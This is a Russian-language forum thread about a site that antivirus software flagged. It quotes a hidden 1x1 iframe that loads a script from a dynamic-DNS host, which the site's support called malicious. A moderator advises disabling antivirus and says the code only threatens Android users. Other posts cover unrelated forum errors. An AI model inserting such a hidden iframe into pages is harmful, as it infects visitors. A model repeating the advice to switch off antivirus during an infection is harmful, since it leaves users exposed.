Люди у меня касперский ругаеться что делать?
EvganS, добавь сайт в исключения, отключай антивирус на время пользования сайтом, ищи обходные пути. В любом случае для ПК на сайте угроз нет.
Simmer, мне из подержки написали что этот код <_iframe src="h__p://cbtdzmgqby.sytes.net/atb/counter.php" width=1 height=1 style="visibility: hidden"></_iframe>
являетьяс вредоносним.
EvganS, опасно это только для мобильных устройств на ОС Android. Гера все объяснял.
Вроде все почистил, не знаю насколько долго нам не подкинут новых вирусов. Вот отчет яндекса:
Не знаю, через сколько Касперски простит все обиды и перестанет на нас дуться, по идее, должен уже перестать. Но для меня самое главное, яндекс не выкинет нас из своих баз поиска.
Обожаю читать комментарии на сайте, порой эти великосветские беседы просто убивают наповал
Ребята я не знаю куда писать, но может мне кто объяснит почему я битых 10 часов не могла зайти на форум? Выдавало ошибку 403 и говорили что я не могу зайти.А сейчас все нормально.Просто мне интересно это у меня или у вас ошибка была?
gor2104va, была внутренняя ошибка сервера. У всех.
Не нашла, где можно задать вопрос: у меня пропало оповещение об именинниках внизу главной страницы. Это только у меня, или это нововведение?
Idea and creation: fuldon (aka miXei) © 2000-2015